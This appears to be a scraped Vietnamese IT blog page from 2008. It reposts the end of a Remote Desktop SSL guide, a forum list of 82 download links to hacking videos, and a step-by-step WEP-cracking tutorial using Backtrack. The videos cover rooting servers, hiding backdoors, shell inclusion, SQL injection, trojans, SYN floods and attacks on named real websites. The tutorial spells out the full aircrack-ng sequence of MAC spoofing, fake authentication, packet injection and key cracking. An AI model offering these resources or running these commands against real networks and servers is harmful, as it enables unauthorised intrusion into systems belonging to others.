
B7 : Trong cửa sổ remote connection > chọn option > qua tab security > Quan sát trong mục Authentication > là Required Authentication

B8: Qua tab General > điền vào phần computer cái tên CA mà bạn đã xin trên server ( tên máy tính , IP …. ) > chọn connect

B9 : Remote thành công > quan sát thấy đường truyền giữa client và server đã được mã hóa ( cái biểu tượng khóa màu vàng á )

Ngồn : Nhatnghe

url:http://haiphongit.com/forum/showthread.php?t=2842

bộ sưu tập tổng hợp link down các video dạy hack

2008-09-11T19:37:00.001-07:00

bộ sưu tập tổng hợp link down các video dạy hack
có thể 1 số link đã die mong ae thông cảm dùm,link nào die ae kiếm cái khác fix dùm nha

1> http://warezshare.com/download.php?f...df7d54a71f7663
2> http://thanhnamhp.com.vn/cfm.rar
3> http://www.filenanny.com/files/46ecc.../Hacklocal.rar
bug local backup data
4> http://www.mediamax.com/vipundergrou...kup%20data.zip
5>hack shop cfm
http://www.mediamax.com/vipundergroup/Hosted/cfm.rar
6>down load hack
http://www.mediamax.com/vipundergrou...d/download.rar
7>bug esyndicat
http://www.mediamax.com/vipundergrou..._esyndicat.rar
8>bug ezupload
http://www.mediamax.com/vipundergrou...upload-leo.rar
9>file manager bug
http://www.mediamax.com/vipundergrou...le_Manager.rar
10>get root 1
http://www.mediamax.com/vipundergrou...d/getroot1.rar
11>get root2
http://www.mediamax.com/vipundergrou...d/getroot2.rar
12>get root3
http://www.mediamax.com/vipundergrou...d/getroot3.rar
13>Hacking vbb 3.6.6 bug XSS
http://www.mediamax.com/vipundergrou...g%20XXS%29.rar
14>hide backdoor1
http://www.mediamax.com/vipundergrou...0backdoor1.rar
15>hide backdoor2
http://www.mediamax.com/vipundergrou...0backdoor2.rar
16>how i get free host (hack host demo)
http://www.mediamax.com/vipundergrou...etfreehost.rar
17>Invision_Power_Board_2[1].1.7_Password_Change_Demonstration
http://www.mediamax.com/vipundergrou..._Power_Board_2
18>local hack1
http://www.mediamax.com/vipundergrou...al%20hack1.rar
19>local hack2
http://www.mediamax.com/vipundergrou...al%20hack2.rar
20>local hack3
http://www.mediamax.com/vipundergrou...al%20hack3.rar
21>Phim huong dan hack co ban nhat
http://www.mediamax.com/vipundergrou...dan%20hack.rar
22>phpbb
http://www.mediamax.com/vipundergroup/Hosted/phpbb.rar
23>Remote destop hack
http://www.mediamax.com/vipundergrou...Remote-vnc.rar
24>rEmOtEr_VS_Microsoft
http://www.mediamax.com/vipundergrou..._Microsoft.rar
25>SQL injection1
http://www.mediamax.com/vipundergrou...Linjection.rar
26>SQL injection2
http://www.mediamax.com/vipundergrou...injection2.rar
27>how to hack thanhhoa.gov.vn
http://www.mediamax.com/vipundergrou...d/thanhhoa.rar
28>upload hack1
http://www.mediamax.com/vipundergrou...ed/upload1.rar
29>upload hack2
http://www.mediamax.com/vipundergrou...ed/upload2.rar
30>upload hack3
http://www.mediamax.com/vipundergrou...ed/upload3.rar
31>vbb 3.5.x bug ugrade
http://www.mediamax.com/vipundergrou...g%20ugrade.rar
32>video fake ip
http://www.mediamax.com/vipundergrou...0fake%20ip.rar
windows exploit
33>http://www.mediamax.com/vipundergrou...ws-exploit.rar
34>xsst unnelling-video
http://www.mediamax.com/vipundergrou...ling-video.zip
35>Yahoo Fake [FuLL ViDEO bY HeliOs]
http://www.mediamax.com/vipundergrou...ahoo%20Fake%20[FuLL%20ViDEO%20bY%20HeliOs].rar
36>hackshop
http://www.mediamax.com/vipundergrou...d/hackshop.rar
37>video tut backconnect "Moi nguoi fale Ip thif down duoc bang link nay"
http://freewebtown.com/hackingvn/vid...backconect.rar
38>SQL Injection 4
http://www.box.net/shared/static/rsuoufbpj1.rar
or http://rapidshare.com/files/59957095/leo2.rar
39>Demo how i got root on server HPTVIETNAM
http://www.megaupload.com/?d=1KGA9NGK
40>Backdoor and JPG
http://str0ke213.tradebit.com/pub/8/57.swf
41>Crack MD5 user online and Cain
http://dl1.filmshare24h.net/md5-password-cracking.swf
42>hack computer trên mạng internet!
http://www.y0ume.net/video/hack%20computer.rar
43>409 Video hack
http://www.forcehacker.com/videos.html
44>một cách ẩn shell
http://www.y0ume.net/video/chenshell.rar
45>Một đống video hacking nhìu wá
http://137.132.19.24/security_course/vid_tutorials/
46>Windows Password Hacking (Video)
http://www.youtube.com/watch?v=vZDgR...search=laporte
47>iFrame DoS Explained
http://one.revver.com/watch/211124
48>Hack Shop CFM ,Remote PC,Check CC
http://uploadingit.com/files/197409_...S(Fix%202).zip
49>video hacking from PLD
http://rapidshare.de/files/36172349/Sec.Videos1.rar
http://rapidshare.de/files/36169967/Sec.Videos2.rar
50>video clip attack thanhhoa.gov.vn
khoai.bop.vu/thanhhoa.rar
51>TUT hack shop asp moi!!!!!!!!!!!!!!!
http://207.210.226.130/~thomaser/tool/hackasp.rar
52>upload hacking phần 2
http://thanhnamhp.com.vn/upload.rar
http://www.videos.learntohell.net/infectedgif.swf
53>VNC Remote video
http://kid1412.110mb.com/Remote-vnc.rar
http://kid1412.110mb.com/VNC.zip
54>1 kho video nữa nè
Anh em down thoải mái nha
http://aria-security.net/UPDATES/1st/Video/
http://video.hackinthebox.org/2006.html
http://chaosradio.ccc.de/22c3_m4v_563.html
http://shmoocon.org/2006/presentations.html
How Get Root Safe Mode On Server
http://www.freewebs.com/lyokha/CraVideos.rar
55> windows fun
http://warezshare.com/download.php?f...541ea58e44c56f
http://warezshare.com/download.php?f...10ddc3e346dbe2
56>Include shell trong PHP
phan 1: http://www.megaupload.com/vn/?d=9YW156EC
phan 2: http://www.megaupload.com/?d=Y8HFO9EH
57>video chào mừng 2/9
http://www.megaupload.com/?d=I92BALB5
58>==>>Windows server rooting<<==
http://www.freewebs.com/lyokha/winserverrooting.avi.flv
59>Video Local r00t Update 2007 - zer0c00l
http://rapidshare.com/files/51844339/r00t2007.rar.html
60>video dùng trojan Shark 2
http://freewebtown.com/hackingvn/videohack/sharK 2 Tutorial.rar
61>clip hack VBB với lỗi SQL injection ( mod RPG Inferno v2.4)
http://69.89.31.82/~seyiloco/leo9x/leo.rar
http://69.89.31.82/~seyiloco/leo9x/leo.txt
http://69.89.31.82/~seyiloco/leo9x/milw0rm.txt
62>Video hacking , bug upload :-D
http://www.megaupload.com/?d=S7W44YQ0
63>Chèn Backdoor vào tập tin JPG
http://str0ke213.tradebit.com/pub/8/57.swf
64>getroot
http://quangtrungschool.org/upload/getroot1.rar
65>[video] Include Shell VBB & Hide Backdoor for newbie
http://www.box.net/public/2koz7exe6q
66>Video hack ibf
http://www.badongo.com/file/3562304
http://www.quangtrungschool.org/upload/Hack_ipf.rar
67>video download by pass!
http://66.165.236.155/~wayland/Tut.zip
68>Exploit For vBulletin_all_version
http://www.megaupload.com/?d=YK270LVU
69>Include shell với PhpBB
http://rapidshare.com/files/9742816/...shell.rar.html
http://www.4shared.com/file/8167032/...ludeshell.html
70>Video Music Thai Anh exp-do Langtuhoahao found !!!
http://orange.smartwavetech.com/~yeu...on_thaianh.rar
71>tài nguyên video
http://www.irdu.nus.edu.sg/security_...vid_tutorials/
72>Video Lesson - Inject Trojan 2 Web vs Hack Infobar Sp2
Link : http://z0mbie12.net/videoclip/exe2vbs-videohacking2.rar
73>Invision Power Board 2.1.7 (Debug) Remote Password Change Demonstration
http://rapidshare.com/files/19230640...onstration.rar
or
http://rapidshare.com/files/2155224/ipb217.swf
74>Bugs local backup data
tp://tailieumang.info/Tut.zip
75>SYN Flood
http://k49c.net/gk/SYNFlood.rar
76>Hacking Movies
http://2600.ir/pages/videoclips.htm
77>tut hack site ezupload (video)
http://www.megaupload.com/?d=GCSXUELR
78>1 site rất hay
http://www.giaiphapantoan.com/index....per&Itemid=112
79>Video Get root Linux 2.4.25
http://www.megaupload.com/?d=T9BCFRF4 or
http://www.4shared.com/file/8358713/...ot_Access.html
80>sử dụng bug eGallery trong PHP-Nuke để upshell lên server
http://milw0rm.com/video/watch.php?id=29
81>1 site security video
www.learnsecurityonline.com
http://phreaknic.wilpig.org/
http://www.hackerscenter.com/video/
http://www.illegalworld.com/
82>Video hacking phpinjection
http://video.antichat.org/download_150.html

Sưu tập

۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩ Chữ ký của itvnn ۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩۩

url:http://haiphongit.com/forum/showthread.php?t=1388

Tutorial: Cracking WEP Using Backtrack 3

2008-09-09T03:18:00.000-07:00

19 Aug 2008
Tutorial: Cracking WEP Using Backtrack 3
Standard Disclaimer: This article is provided for informational purposes only. thew0rd.com and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.

This article will explan how to crack 64bit and 128bit WEP on many WIFI access points and routers using Backtrack, a live linux distribution. Your mileage may very. The basic theory is that we want to connect to an Access Point using WEP Encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, finally cracking the WEP key. I have tested this technique on an IBM Thinkpad x60 and Acer 5672 and the WIFI Chipset in those machines work for sure.

Requirements:

* Backtrack 3 on CD or USB
* Computer with compatible 802.11 wireless card
* Wireless Access point or WIFI Router using WEP encryption

I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:
Preparing The WIFI Card

First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw
The above commands will enable monitor mode on the wireless chipset in your computer. Next we must stop your WIFI card:

iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]
Then:

ifconfig down [interface]
Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]
Its now time to start the card in monitor mode by doing:

airmon-ng start [device]
airmon-ngstart1.png
Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]
airodumpwifi0.png

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

airodumpoutput.png

The above command will output data collected to the file: network.out. This file will be fed into the WEP Crack program when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. Test the access point by issuing the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
aireplayfakeauth.png

If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplaygenerateivs.png

This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.

captureivs_0.png

After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
aireplayattack2p.png

Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.

crackng.png

Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.

You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Goodluck!

DAICA

Hơn 100 tuổi vẫn thích blog 'mì ăn liền'

Cài đặt Asterisk

'Tôi giữ cách nhìn thận trọng về phục hồi kinh tế'

Diễn đàn Cổ Vật Tinh Hoa

hòn đá cuội

Hạn chế vi phạm bản quyền bằng việc sử dụng các phần mềm tự do nguồn mở

Việt Nam sắp sử dụng phần mềm nguồn mở trên diện rộng

Việt Nam sắp sử dụng phần mềm nguồn mở trên diện rộng

10 công cụ phân tích Web miễn phí và hiệu quả

10 công cụ phân tích Web miễn phí và hiệu quả

10 viên gạch xây nên chiến lược cạnh tranh của Michael Porter

Never start a project unless all resources are available

Friday, February 03, 2006

Never start a project unless all the resources are available

6 yếu tố cần tránh khi hợp tác kinh doanh

6 yếu tố cần tránh khi hợp tác kinh doanhCập nhật lúc: 15h 05.11.2008

IT Manager - job description

Enable/Configure DHCP Snooping in Cisco Catalyst Switches (IOS)

Enable/Configure DHCP Snooping in Cisco Catalyst Switches (IOS)

Related Posts

2 Comments so far »

How to create VLAN Interfaces for InterVLAN Routing in Cisco IOS

Configure Cisco Port Security on Switches and Router interface

Adding a Cisco switch to a VTP domain

How to configure a Cisco Catalyst switch to act as a DHCP relay agent

Cách tấn công hệ thống Cisco!!!

Tất cả các lệnh cấu hình trong CCNA theo chuyên mục

Cấu hình switch cơ bản

Lab 6-1: Cấu hình vlan và trunk

Cisco Routers - Basic notes

Hướng dẫn download Rapidshare bằng Rapidleech

What is a VLAN? How to Setup a VLAN on a Cisco Switch

Giới thiệu các phương thức Cr@ck Passwords - Cách đề phòng

How to configure RPC dynamic port allocation to work with firewalls

WMIC Samples

Active Directory Service Interfaces (ADSI) Benefits

Scripts to manage Folders activexperts.com

Another way to download from rapidshare

Danh sách các forum hacker vietnam

bộ sưu tập tổng hợp link down các video dạy hack(full version)

Thiết lập tường lửa Iptables cho Linux

Phát hiện và chống xâm nhập Web Server với Mod Security

Mẹo và thủ thuật bảo mật SSH nâng cao

Tăng Độ Bảo Mật Khi Remote Desktop Bằng SSL

bộ sưu tập tổng hợp link down các video dạy hack

Tutorial: Cracking WEP Using Backtrack 3

6 yếu tố cần tránh khi hợp tác kinh doanh
Cập nhật lúc: 15h 05.11.2008